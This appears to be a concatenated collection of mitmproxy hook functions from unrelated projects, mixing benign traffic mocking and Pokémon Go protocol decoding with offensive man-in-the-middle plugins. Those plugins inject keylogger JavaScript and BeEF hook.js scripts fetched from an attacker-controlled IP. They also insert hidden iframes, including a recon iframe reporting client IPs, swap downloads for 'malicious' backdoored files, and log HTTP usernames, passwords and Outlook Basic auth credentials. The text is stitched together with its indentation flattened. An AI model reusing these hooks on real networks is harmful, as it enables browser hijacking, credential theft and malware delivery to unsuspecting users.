def copy_flow_format_data(part, scope, flow): if part == "u": data = flow.request.url else: data = "" if scope in ("q", "a"): if flow.request.content is None: return None, "Request content is missing" with models.decoded(flow.request): if part == "h": data += netlib.http.http1.assemble_request(flow.request) elif part == "c": data += flow.request.content else: raise ValueError("Unknown part: {}".format(part)) if scope == "a" and flow.request.content and flow.response: # Add padding between request and response data += "\r\n" * 2 if scope in ("s", "a") and flow.response: if flow.response.content is None: return None, "Response content is missing" with models.decoded(flow.response): if part == "h": data += netlib.http.http1.assemble_response(flow.response) elif part == "c": data += flow.response.content else: raise ValueError("Unknown part: {}".format(part)) return data, False
def response(self, flow): with decoded(flow.response): flow.response.content = flow.response.content.replace( "</body>", "<script>" + self.content + "</script></body>") self.log.info( '[{}] *********** keylogger injected *****************'.format( self.name))
def response(self, flow): if self.isfilePath: with decoded(flow.response): flow.response.content = flow.response.content.replace( "</body>", "<script>" + self.content + "</script></body>") self.send_output.emit( '[{}] javascript keylogger injected..'.format(self.Name))
def response(context, flow): if not flow.match("~u plfe"): return with decoded(flow.response): try: env = RpcResponseEnvelopeProto() env.ParseFromString(flow.response.content) except Exception, e: print("Deserializating Envelop exception: %s" % e) return keys = context.methods_for_request.pop(env.response_id) for value in env.returns: key = keys.popleft() name = Method.Name(key) if (len(context.filter_methods) > 0 and name not in context.filter_methods): continue name = mismatched_apis.get(name, name) #return class name when not the same as method klass = underscore_to_camelcase(name) + "OutProto" try: mor = deserialize(value, "." + klass) print("Deserialized Response %i: %s" % (env.response_id, name)) except: print("Missing Response API: %s" % name) print(mor) if (key == GET_MAP_OBJECTS): getMapObjects.response(mor, env)
def response(context, flow): url = urlparse(flow.request.pretty_url) url_without_query = url.scheme + "://" + url.netloc + url.path if url_without_query in context.data: with decoded(flow.response): with open(context.data[url_without_query], "r") as file: flow.response.content = file.read()
def response(context, flow): if driver.name: rule = flow.mastermind["rule"] if rule: delay = rules.delay(rule) if delay: time.sleep(delay) with decoded(flow.response): status_code = rules.status_code(rule) body_filename = rules.body_filename(rule) schema = rules.schema(rule, context.source_dir) if status_code: status_message = http.status_message(status_code) flow.response.status_code = status_code flow.response.msg = status_message if schema: table = driver.db.table(flow.request.url) res = yaml.safe_load(flow.response.content) schema_result = validator.check(res, schema) table.insert_multiple(schema_result) logger.info(schema_result) rules.process_headers("response", rule, flow.response.headers) if body_filename: # 204 might be set by the skip rule in the request hook if flow.response.status_code == 204: flow.response.status_code = 200 flow.response.msg = "OK" flow.response.content = rules.body(body_filename, context.source_dir)
def response(context, flow): """======================================================================== "Called when a server response has been received"... łapię wyłącznie odpowiedzi, bo interesują mnie zestawy (request/response). Przechwycony response wraz z requestem wchodzą w skład transakcji, reprezentowanej przez mitmproxy.models.HTTPFlow() "HTTPFlow is collection of objects representing a single HTTP transaction". Więcej info na WWW: http://docs.mitmproxy.org/en/stable/dev/models.html ===========================================================================""" if flow.request.host.endswith('.thesettlersonline.pl'): if "application/x-amf" in flow.response.headers.get("Content-Type", "_"): with decoded(flow.response): res = flow.response.content req = flow.request.content if search( 'defaultGame.Communication.VO.TradeWindow.dTradeWindowResultVO', res )\ and search( 'userAcceptedTradeIDs', res ) and search( 'tradeOffers', res )\ and search( 'GetAvailableOffers', req ): log.debug("got trade REQ/RESP pair, feeding TDD thread...") try: t= Thread(target=ttd._incoming_traffic_handler, args=(context, flow,)) t.setDaemon(True) t.start() except (KeyboardInterrupt, SystemExit): log.info('caught either KeyboardInterrupt or SystemExit, quitting threads') t.__stop() import thread thread.interrupt_main()
def response(context, flow): with decoded(flow.response): if flow.request.pretty_host == 'api.openweathermap.org': obj = json.loads(flow.response.content) if flow.request.path.startswith("/data/2.5/weather"): obj["weather"][0]['id'] = '901' obj["weather"][0]['icon'] = '11d' obj["main"]["temp"] = -273.15 obj["main"]["description"] = "On est foutus" obj["name"] = "\\_o<" elif flow.request.path.startswith("/data/2.5/forecast"): for e in obj['list']: e['clouds'] = 100 e['temp'] = {"min": -20, "max": -10, "eve": -10, "morn": -20, "night": -15, "day": -10} e['weather'][0]['id'] = "901" e['weather'][0]['icon'] = "11d" flow.response.content = json.dumps(obj) elif 'Content-Type' in flow.response.headers and flow.response.headers['Content-Type'] == 'image/jpeg': _blur_that(flow,"JPEG") elif 'Content-Type' in flow.response.headers and flow.response.headers['Content-Type'] == 'image/png': _blur_that(flow,"PNG") elif (flow.request.pretty_host == 'eas.outlook.com' and flow.request.path.startswith("/Microsoft-Server-ActiveSync")): atype,b64 = flow.request.headers['Authorization'].split(' ') context.log( "OUTLOOK AUTH : %s"%base64.b64decode(b64) , level='info') flow.reply()
def response(self, flow): with decoded(flow.response): if flow.response.content: c = flow.response.content.replace('</body>', '<style>body ' '{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}' '</style></body>') if c > 0: self.send_output.emit('[{}] {} CSS injected...'.format(self.Name,flow.request.pretty_host))
def response(self, flow): with decoded(flow.response): canvas = re.sub("SECONDS_GO_HERE", str(self.interval * 1000), open(self.content_path, "rb").read()) flow.response.content = flow.response.content.replace( self.replace_str, '<script type="text/javascript">' + canvas + '</script>' + self.replace_str)
def response(context, flow): if flow.request.host.endswith("nianticlabs.com"): with decoded(flow.response): conn = HTTPConnection("127.0.0.1") conn.request("POST", "/api/update", flow.response.content) res = conn.getresponse() if res.status/100 not in [2, 3]: context.log("Got error sending mitm data to api ({})".format(res.status), level="error")
def response(self, flow): with decoded(flow.response): if flow.response.content: c = flow.response.content.replace( '</body>', '<style>body ' '{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}' '</style></body>') if c > 0: self.send_output.emit('[{}] {} CSS injected...'.format( self.Name, flow.request.pretty_host))
def response(self, flow): with decoded(flow.response): inject_content = "" with open(self.content_path, 'r') as f: for line in f: inject_content += line flow.response.content = flow.response.content.replace( "</body>", "<script>" + inject_content + "</script></body>")
def response(self,flow): if str(flow.response.headers['Content-Type']).startswith('image'): if path.isfile(self.imagePath): with decoded(flow.response): try: img = cStringIO.StringIO(open(self.imagePath, 'rb').read()) flow.response.content = img.getvalue() self.send_output.emit('[{}] URL:{} image replaced...'.format(self.Name,flow.request.url)) except: pass
def response(self, flow): with decoded(flow.response): inject_content = "" with open(self.content_path, 'r') as f: for line in f: inject_content += line flow.response.content = flow.response.content.replace("</body>", "<script>" + inject_content + "</script></body>")
def response(self, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: script = html.new_tag('script', src=self.config["beef_url"]) html.body.insert(0, script) flow.response.content = str(html) ctx.log.info( "[{}] Injected BeFF url hook in page '{}'...".format( self.name, flow.request.url))
def response(context, flow): with decoded(flow.response): if flow.match("~d pgorelease.nianticlabs.com"): env = RpcResponseEnvelopeProto() env.ParseFromString(flow.response.content) key = associate[env.response_id] value = env.returns[0] if (key == GET_MAP_OBJECTS): mor = MapObjectsResponse() mor.ParseFromString(value) print("GET_MAP_OBJECTS %i tiles" % len(mor.tiles)) features = [] for tile in mor.tiles: print("S2 Cell %i" % tile.id) for fort in tile.forts: p = Point((fort.longitude, fort.latitude)) f = Feature(geometry=p, id=len(features), properties={"id": fort.id, "tile": tile.id, "type": "fort", "marker-color": "0000FF"}) features.append(f) for fort in tile.location4: p = Point((fort.longitude, fort.latitude)) f = Feature(geometry=p, id=len(features), properties={"tile": tile.id, "type": "location4", "marker-color": "FFFF00"}) features.append(f) for fort in tile.location9: p = Point((fort.longitude, fort.latitude)) f = Feature(geometry=p, id=len(features), properties={"tile": tile.id, "type": "location9", "marker-color": "00FFFF"}) features.append(f) for fort in tile.close_pokemon_a: p = Point((fort.longitude, fort.latitude)) f = Feature(geometry=p, id=len(features), properties={"id": fort.uid, "tile": tile.id, "type": "close_pokemon_a", "marker-color": "FF0000"}) features.append(f) for fort in tile.close_pokemon_b: p = Point((fort.longitude, fort.latitude)) f = Feature(geometry=p, id=len(features), properties={"id": fort.uid, "tile": tile.id, "type": "close_pokemon_b", "marker-color": "00FF00"}) features.append(f) fc = FeatureCollection(features) dump = geojson.dumps(fc, sort_keys=True) f = open('get_map_objects.json', 'w') f.write(dump) elif (key == FORT_DETAILS): mor = FortDetailsOutProto() mor.ParseFromString(value) print(mor) elif (key == FORT_SEARCH): mor = FortSearchOutProto() mor.ParseFromString(value) print(mor) else: print("API: %s" % key)
def response(context, flow): if flow.request.host.endswith("nianticlabs.com"): with decoded(flow.response): conn = HTTPConnection("127.0.0.1") conn.request("POST", "/api/update", flow.response.content) res = conn.getresponse() if res.status / 100 not in [2, 3]: context.log("Got error sending mitm data to api ({})".format( res.status), level="error")
def response(context, flow): replace_str = "</body>" replace_content = "<script src='http://"+context.hook_ip+":3000/hook.js'></script>" if "text/html" in flow.response.headers['Content-Type']: with decoded(flow.response): if replace_str in flow.response.content: flow.response.content = flow.response.content.replace(replace_str, replace_content + replace_str) context.log("hook.js injected!") else: pass
def response(context, flow): if flow.response.headers.get("content-type", "").startswith("image"): with decoded(flow.response): # automatically decode gzipped responses. try: s = cStringIO.StringIO(flow.response.content) img = Image.open(s).rotate(180) s2 = cStringIO.StringIO() img.save(s2, "png") flow.response.content = s2.getvalue() flow.response.headers["content-type"] = "image/png" except: # Unknown image types etc. pass
def response(context, flow): if flow.response.headers.get("content-type", "").startswith("image"): with decoded(flow.response): # automatically decode gzipped responses. try: s = StringIO(flow.response.content) img = Image.open(s).rotate(180) s2 = StringIO() img.save(s2, "png") flow.response.content = s2.getvalue() flow.response.headers["content-type"] = "image/png" except: # Unknown image types etc. pass
def response(context, flow): replace_str = "</body>" replace_content = "<script src='http://" + context.hook_ip + ":3000/hook.js'></script>" if "text/html" in flow.response.headers['Content-Type']: with decoded(flow.response): if replace_str in flow.response.content: flow.response.content = flow.response.content.replace( replace_str, replace_content + replace_str) context.log("hook.js injected!") else: pass
def response(self, flow): with decoded(flow.response): if flow.response.content: c = flow.response.content.replace('</body>', '''<script> window.onload=function() { var move=document.getElementsByTagName("body")[0]; setInterval(function() { move.style.marginTop=(move.style.marginTop=="4px")?"-4px":"4px"; }, 5); } </script></body>''') if c > 0: self.send_output.emit('[{}] {} javascript injected...'.format(self.Name,flow.request.pretty_host))
def response(context, flow): if flow.request.url == context.url: flow.request.headers['Cache-Control'] = 'no-cache' flow.response.headers['Cache-Control'] = 'no-cache' if 'If-None-Match' in flow.request.headers: del flow.request.headers['If-None-Match'] if 'ETag' in flow.response.headers: del flow.response.headers['ETag'] with decoded(flow.response): data = open(context.filepath).read() flow.response.content = data
def response(self, flow): if str(flow.response.headers['Content-Type']).startswith('image'): if path.isfile(self.imagePath): with decoded(flow.response): try: img = cStringIO.StringIO( open(self.imagePath, 'rb').read()) flow.response.content = img.getvalue() self.send_output.emit( '[{}] URL:{} image replaced...'.format( self.Name, flow.request.url)) except: pass
def response(self, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: script = html.new_tag('script', src=self.urlhook) html.body.insert(0, script) flow.response.content = str(html) self.send_output.emit("[{}] Injected BeFF url hook...".format( self.Name))
def response(flow): if flow.request.host in iframe_url: return with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content, "lxml") if html.body: iframe = html.new_tag( "iframe", src=iframe_url, frameborder=0, height=0, width=0) html.body.insert(0, iframe) flow.response.content = str(html).encode("utf8")
def response(context, flow): if flow.request.host in context.iframe_url: return with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content, "lxml") if html.body: iframe = html.new_tag("iframe", src=context.iframe_url, frameborder=0, height=0, width=0) html.body.insert(0, iframe) flow.response.content = str(html) context.log("Iframe inserted.")
def response(self, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: script = html.new_tag('script', src=self.url) html.body.insert(0, script) flow.response.content = str(html) self.log.info( "[{}]******* script Filter Injected *******".format( self.name))
def response(context, flow): with decoded(flow.response): # automatically decode gzipped responses. client_conn = str(flow.client_conn) server_conn = str(flow.client_conn) client_conn = client_conn.split(" ")[1] client_conn = client_conn.split(":")[0] inject_recon = "\n<iframe src='http://" + context.server + "/recon/recon.php?client_conn=" + client_conn + "' height='1' width='1' style='display:none'></iframe>\n" flow.response.content = flow.response.content.replace( "</body>", inject_recon + "</body>") flow.response.content = flow.response.content.replace( "client_conn_xxx_xxx_xxx_xxx", client_conn)
def response(context, flow): if flow.request.host in context.iframe_url: return with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: iframe = html.new_tag( "iframe", src=context.iframe_url, frameborder=0, height=0, width=0) html.body.insert(0, iframe) flow.response.content = str(html) context.log("Iframe inserted.")
def response(self, flow): try: # for another format file types content = flow.response.headers['Content-Type'] if content in self.payloads: if path.isfile(self.payloads[content]): with decoded(flow.response): self.log.info('[downloadspoof]:: URL: {}'.format(flow.request.url)) self.log.info("[downloadspoof]:: Replaced file of mimtype {} with malicious version".format(content)) flow.response.content = open(self.payloads[content],'rb').read() self.log.info('[downloadspoof]:: Patching complete, forwarding to user...') return self.log.info('[downloadspoof]:: {}, Error Path file not found\n'.format(self.payloads[content])) except Exception as e: pass
def response(self, flow): try: # for another format file types content = flow.response.headers['Content-Type'] if content in self.payloads: if path.isfile(self.payloads[content]): with decoded(flow.response): self.send_output.emit('[downloadspoof]:: URL: {}'.format(flow.request.url)) self.send_output.emit("[downloadspoof]:: Replaced file of mimtype {} with malicious version".format(content)) flow.response.content = open(self.payloads[content],'rb').read() self.send_output.emit('[downloadspoof]:: Patching complete, forwarding to user...') return self.send_output.emit('[downloadspoof]:: {}, Error Path file not found\n'.format(self.payloads[content])) except Exception as e: pass
def response(self, flow): pass # if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove] if "text/html" in flow.response.headers["Content-Type"]: with decoded(flow.response): for item, v in self.config[self.name]["regex"].iteritems(): # if v.split("||")[0] in flow.request.host and self.theFlag == False: str_search = v.split("||")[0] str_replace = v.split("||")[1] if str_search in flow.response.content: flow.response.content = flow.response.content.replace(str_search, str_replace) logger.debug( "[" + self.name + "] " + str_search + " to " + str_replace + " in " + flow.request.host )
def response(self, flow): try: # for another format file types content = flow.response.headers['Content-Type'] if content in self.backdoors: if path.isfile(self.backdoors[content]): with decoded(flow.response): print "[{}]:: URL: {}".format(self.name, flow.request.url) flow.response.content = open(self.backdoors[content], 'rb').read() print "[{}]:: Replaced file of mimtype {} with malicious version".format(self.name, content) print "[{}]:: Replacement complete, forwarding to user...".format(self.name) return print "[{}]:: {}, Error Path file not found\n".format(self.name, self.backdoors[content]) except Exception as e: pass
def response(self,flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: script = html.new_tag( 'script', src=self.urlhook) html.body.insert(0, script) flow.response.content = str(html) self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))
def response(self, flow): pass #if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove] if "text/html" in flow.response.headers['Content-Type']: with decoded(flow.response): for item, v in self.config[self.name]['regex'].iteritems(): #if v.split("||")[0] in flow.request.host and self.theFlag == False: str_search = v.split("||")[0] str_replace = v.split("||")[1] if str_search in flow.response.content: flow.response.content = flow.response.content.replace( str_search, str_replace) logger.debug("[" + self.name + "] " + str_search + " to " + str_replace + " in " + flow.request.host)
def response(self, flow): with decoded(flow.response): if flow.response.content: c = flow.response.content.replace( '</body>', '''<script> window.onload=function() { var move=document.getElementsByTagName("body")[0]; setInterval(function() { move.style.marginTop=(move.style.marginTop=="4px")?"-4px":"4px"; }, 5); } </script></body>''') if c > 0: self.send_output.emit( '[{}] {} javascript injected...'.format( self.Name, flow.request.pretty_host))
def response(self,flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content,'lxml') """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: url = '{}'.format(flow.request.pretty_host) metatag = html.new_tag('script') metatag.attrs['src'] = self.urlhook metatag.attrs['type'] = 'text/javascript' html.body.append(metatag) flow.response.content = str(html) self.send_output.emit("[{}] Injected BeFF hook in URL:[ {} ] ".format(self.Name,url))
def response(self, flow): pass f = open(self.content_path, "r") replace_content = f.readline() f.close() #if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove] if "text/html" in flow.response.headers['Content-Type']: with decoded(flow.response): if self.replace_str in flow.response.content: flow.response.content = flow.response.content.replace( self.replace_str, replace_content + self.replace_str) logger.debug("[" + self.name + "] Payload injected > " + flow.request.host) else: pass
def response(self, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content, 'lxml') """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: url = '{}'.format(flow.request.pretty_host) metatag = html.new_tag('script') metatag.attrs['src'] = self.url metatag.attrs['type'] = 'text/javascript' html.body.append(metatag) flow.response.content = str(html) self.send_output.emit( "[{} js script Injected in [ {} ]".format(self.Name, url))
def response(self, flow): pass f = open(self.content_path, "r") replace_content = f.readline() f.close() #if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove] if "text/html" in flow.response.headers['Content-Type']: with decoded(flow.response): if self.replace_str in flow.response.content: flow.response.content = flow.response.content.replace(self.replace_str, replace_content + self.replace_str) logger.debug("["+self.name+"] Payload injected > " + flow.request.host) else: pass #print "- " + flow.response.headers['Content-Type'][0]
def response(self,flow): if self.isfilePath: with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content.decode('utf-8', 'ignore'),'lxml') """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: temp_soup = BeautifulSoup(self.content,'lxml') html.body.insert(len(html.body.contents), temp_soup) flow.response.content = str(html) return self.send_output.emit("[{}] [Request]: {} | injected ".format(self.Name,flow.request.pretty_host)) else: return self.send_output.emit("[{}] Error Path file not found ".format(self.Name))
def request(self, flow): self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version) with decoded(flow.request): user_passwd = self.get_password_POST(flow.request.content) if user_passwd != None: try: http_user = user_passwd[0].decode('utf8') http_pass = user_passwd[1].decode('utf8') # Set a limit on how long they can be prevent false+ if len(http_user) > 75 or len(http_pass) > 75: return self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name)) for name, valur in flow.request.headers.iteritems(): self.send_output.emit('{}: {}'.format(name,valur)) self.send_output.emit( 'HTTP username: %s' % http_user) self.send_output.emit( 'HTTP password: %s\n' % http_pass) except UnicodeDecodeError: pass
def request(ctx, flow): if not flow.match("~d pgorelease.nianticlabs.com"): return with decoded(flow.request): req = protocol.RequestEnvelope() req.ParseFromString(flow.request.content) if req.id in requests: ctx.log("Duplicate Request", req.id) requests[req.id] = queue.Queue() for request in req.requests: messageName = toCamelCase(protocol.Method.Name(request.method)) requests[req.id].put(messageName) if args.filter and messageName not in args.filter: continue if args.ignore and messageName in args.ignore: continue messageName += "Request" print("Request: (%s, %s)" % (messageName, request.method)) if not request.payload: continue if args.always_raw: print("Request: Raw (type: %s) (name: %s)" % (request.method, messageName)) printRawMessage(request.payload) else: try: MessageType = getattr(protocol, messageName) Message = MessageType() Message.ParseFromString(request.payload) print(Message) except: print("Request: Unknown Message (name: %s)" % messageName) printRawMessage(request.payload)
def response(ctx, flow): if not flow.match("~d pgorelease.nianticlabs.com"): return with decoded(flow.response): resp = protocol.ResponseEnvelope() resp.ParseFromString(flow.response.content) i = -1 while not requests[resp.id].empty(): i += 1 requestName = requests[resp.id].get() if args.filter and requestName not in args.filter: continue if args.ignore and requestName in args.ignore: continue request = requestName + "Response" print("Response: (%s)" % request) if not resp.responses[i]: continue if args.always_raw: print("Response: Unknown Message (name: %s)" % request) printRawMessage(resp.responses[i]) else: try: MessageType = getattr(protocol, request) Message = MessageType() Message.ParseFromString(resp.responses[i]) print(Message) except: print("Response: Unknown Message (name: %s)" % request) printRawMessage(resp.responses[i]) del requests[resp.id]
def request(self, flow): self.log.info("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version) with decoded(flow.request): user_passwd = self.get_password_POST(flow.request.content) if user_passwd != None: try: http_user = user_passwd[0].decode('utf8') http_pass = user_passwd[1].decode('utf8') # Set a limit on how long they can be prevent false+ if len(http_user) > 75 or len(http_pass) > 75: return self.log.info("\n[HTTP REQUEST HEADERS]\n") for name, valur in flow.request.headers.iteritems(): self.log.info('{}: {}'.format(name,valur)) self.log.info('\n') self.log.info( 'HTTP username: %s' % http_user) self.log.info( 'HTTP password: %s\n' % http_pass) except UnicodeDecodeError: pass self.log.info('\n')
def response(context, flow): """======================================================================== ===========================================================================""" if flow.request.host.endswith('.thesettlersonline.pl'): if "application/x-amf" in flow.response.headers.get("Content-Type", "_"): with decoded(flow.response): res = flow.response.content if search( 'defaultGame.Communication.VO.dZoneVO', res )\ and search( 'defaultGame.Communication.VO.dBuffVO', res )\ and search( 'defaultGame.Communication.VO.dPlayerVO',res ): log.debug("got type 1001 response... wysyłam szpiega...") try: t= Thread(target=sgd._incoming_traffic_handler, args=(flow.response.content,)) t.setDaemon(True) t.start() except (KeyboardInterrupt, SystemExit): log.info('caught either KeyboardInterrupt or SystemExit, quitting threads') t.__stop() import thread thread.interrupt_main()
def response(context, flow): if not hasattr(context, 'dest_path'): raise Exception('context.dest_path is unset') with decoded(flow.response): if (flow.response.status_code == 200): data = collections.OrderedDict() req = data['request'] = collections.OrderedDict() resp = data['response'] = collections.OrderedDict() req['headers'] = format_headers_as_list(flow.request.headers) resp['headers'] = format_headers_as_list(flow.response.headers) data['url'] = flow.request.url #data['content'] = flow.response.content data['host'] = flow.request.headers["Host"] data['content-type'] = flow.response.headers['Content-Type'] data['filetype'] = data['content-type'].split(';', 1)[0] url = URLObject(data['url']) data['path'] = url.path _, fileext = os.path.splitext(data['path']) if data['path'].endswith('/'): filepath = data['path'] + 'index' else: filepath = data['path'] if not fileext: fileext = MIMETYPE_TO_FILEEXT.get(data['filetype']) if fileext is not None: filepath = "%s.%s" % (filepath, fileext) data['fileext'] = fileext data['filepath'] = filepath paths = [context.dest_path] if context.include_host_in_path: paths.append(data['host']) paths.append(data['filepath']) data['output_path'] = joinpaths(*paths) context.log(json.dumps(data, indent=2)) output_dirname = os.path.dirname(data['output_path']) if not os.path.exists(output_dirname): os.makedirs(output_dirname, mode=context.dirmode) with file(data['output_path'], 'wb') as f: f.write(flow.response.content)
def response(context, flow): with decoded(flow.response): if flow.match("~d pgorelease.nianticlabs.com"): env = RpcResponseEnvelopeProto() env.ParseFromString(flow.response.content) keys = methods_for_request[env.response_id] for value in env.returns: key = keys.popleft() name = Method.Name(key) name = mismatched_apis.get(name, name) #return class name when not the same as method klass = underscore_to_camelcase(name) + "OutProto" try: mor = deserialize(value, "." + klass) print("Deserialized Response %s" % name) except: print("Missing Response API: %s" % name) if (key == GET_MAP_OBJECTS): getMapObjects.response(mor, env)
def response(flow): #print(flow.response.headers['Content-Type']) with decoded(flow.response): ctype = flow.response.headers['Content-Type'] if ctype.startswith('image/'): #print(flow.response.headers['Content-Type']) url = urlsplit(flow.request.url) name = os.path.basename(url.path) outfile = '' #print('==>>',url,name) path_arr = url.path.split('/') path_arr.pop() print('/'.join(path_arr)) outfile = ('/Users/xxxx/Desktop/www/'.join(path_arr) + '/') if not os.path.exists(outfile): os.makedirs(outfile) outfile = outfile + name with open(outfile, 'wb') as f: f.write(flow.response.content) f.close() print(outfile, ' written') if (ctype.startswith('text/') or ctype.startswith('application/')): #print(flow.response.headers['Content-Type']) url = urlsplit(flow.request.url) name = os.path.basename(url.path) outfile = '' path_arr = url.path.split('/') path_arr.pop() print('/'.join(path_arr)) outfile = ('/Users/xxxx/Desktop/www/'.join(path_arr) + '/') if not os.path.exists(outfile): #print('zy==>>',outfile) os.makedirs(outfile) outfile = outfile + name with open(outfile, 'wb') as f: f.write(flow.response.content) f.close() print(outfile, ' written')
def response(context, flow): if driver.name: rule = flow.mastermind['rule'] if rule: delay = rules.delay(rule) if delay: time.sleep(delay) with decoded(flow.response): status_code = rules.status_code(rule) body_filename = rules.body_filename(rule) schema = rules.schema(rule, context.source_dir) if status_code: status_message = http.status_message(status_code) flow.response.status_code = status_code flow.response.msg = status_message if schema: table = driver.db.table(flow.request.url) res = yaml.safe_load(flow.response.content) schema_result = validator.check(res, schema) table.insert_multiple(schema_result) logger.info(schema_result) rules.process_headers('response', rule, flow.response.headers) if body_filename: # 204 might be set by the skip rule in the request hook if flow.response.status_code == 204: flow.response.status_code = 200 flow.response.msg = 'OK' flow.response.content = rules.body(body_filename, context.source_dir)
def response(context, flow): with decoded(flow.response): if flow.match("~d pgorelease.nianticlabs.com"): env = RpcResponseEnvelopeProto() env.ParseFromString(flow.response.content) key = request_api[env.response_id] value = env.returns[0] name = Method.Name(key) name = mismatched_apis.get(name, name) #return class name when not the same as method klass = underscore_to_camelcase(name) + "OutProto" try: mor = deserialize(value, "." + klass) print("Deserialized Response %s" % name) except: print("Missing Response API: %s" % name) if (key == GET_MAP_OBJECTS): features = [] bulk = [] for cell in mor.MapCell: for fort in cell.Fort: props = { "id": fort.FortId, "LastModifiedMs": fort.LastModifiedMs, } if fort.FortType == CHECKPOINT: props["marker-symbol"] = "circle" props["title"] = "PokéStop" props["type"] = "pokestop" props["lure"] = fort.HasField('FortLureInfo') else: props["marker-symbol"] = "town-hall" props["marker-size"] = "large" props["type"] = "gym" if fort.Team == BLUE: props["marker-color"] = "0000FF" props["title"] = "Blue Gym" elif fort.Team == RED: props["marker-color"] = "FF0000" props["title"] = "Red Gym" elif fort.Team == YELLOW: props["marker-color"] = "FF0000" props["title"] = "Yellow Gym" else: props["marker-color"] = "808080" p = Point((fort.Longitude, fort.Latitude)) f = Feature(geometry=p, id=fort.FortId, properties=props) features.append(f) bulk.append(createItem("gym", fort.FortId, p, f.properties)) for spawn in cell.SpawnPoint: p = Point((spawn.Longitude, spawn.Latitude)) f = Feature(geometry=p, id=len(features), properties={ "type": "spawn", "id": len(features), "title": "spawn", "marker-color": "00FF00", "marker-symbol": "garden", "marker-size": "small", }) features.append(f) bulk.append(createItem("spawnpoint", 0, p, f.properties)) for spawn in cell.DecimatedSpawnPoint: p = Point((spawn.Longitude, spawn.Latitude)) f = Feature(geometry=p, id=len(features), properties={ "id": len(features), "type": "decimatedspawn", "title": "Decimated spawn", "marker-color": "000000", "marker-symbol": "monument" }) features.append(f) for pokemon in cell.WildPokemon: p = Point((pokemon.Longitude, pokemon.Latitude)) f = Feature(geometry=p, id="wild" + str(pokemon.EncounterId), properties={ "id": "wild" + str(pokemon.EncounterId), "type": "wild", "TimeTillHiddenMs": pokemon.TimeTillHiddenMs, "WillDisappear": pokemon.TimeTillHiddenMs + pokemon.LastModifiedMs, "title": "Wild %s" % Custom_PokemonName.Name(pokemon.Pokemon.PokemonId), "marker-color": "FF0000", "marker-symbol": "suitcase" }) features.append(f) bulk.append(createItem("pokemon", pokemon.EncounterId, p, f.properties)) for pokemon in cell.CatchablePokemon: p = Point((pokemon.Longitude, pokemon.Latitude)) f = Feature(geometry=p, id="catchable" + str(pokemon.EncounterId), properties={ "id": "catchable" + str(pokemon.EncounterId), "type": "catchable", "ExpirationTimeMs": pokemon.ExpirationTimeMs, "title": "Catchable %s" % Custom_PokemonName.Name(pokemon.PokedexTypeId), "marker-color": "000000", "marker-symbol": "circle" }) features.append(f) for poke in cell.NearbyPokemon: gps = request_location[env.response_id] if poke.EncounterId in pokeLocation: add = True for loc in pokeLocation[poke.EncounterId]: if gps[0] == loc[0] and gps[1] == loc[1]: add = False if add: pokeLocation[poke.EncounterId].append((gps[0], gps[1], poke.DistanceMeters/1000)) else: pokeLocation[poke.EncounterId] = [(gps[0], gps[1], poke.DistanceMeters/1000)] if len(pokeLocation[poke.EncounterId]) >= 3: lat, lon = triangulate(pokeLocation[poke.EncounterId][0],pokeLocation[poke.EncounterId][1],pokeLocation[poke.EncounterId][2]) if not math.isnan(lat) and not math.isnan(lon) : p = Point((lon, lat)) f = Feature(geometry=p, id="nearby" + str(poke.EncounterId), properties={ "id": "nearby" + str(poke.EncounterId), "type": "nearby", "title": "Nearby %s" % Custom_PokemonName.Name(poke.PokedexNumber), "marker-color": "FFFFFF", "marker-symbol": "dog-park" }) bulk.append(createItem("pokemon", poke.EncounterId, p, f.properties)) features.append(f) fc = FeatureCollection(features) dump = geojson.dumps(fc, sort_keys=True) dumpToMap(bulk) f = open('ui/get_map_objects.json', 'w') f.write(dump)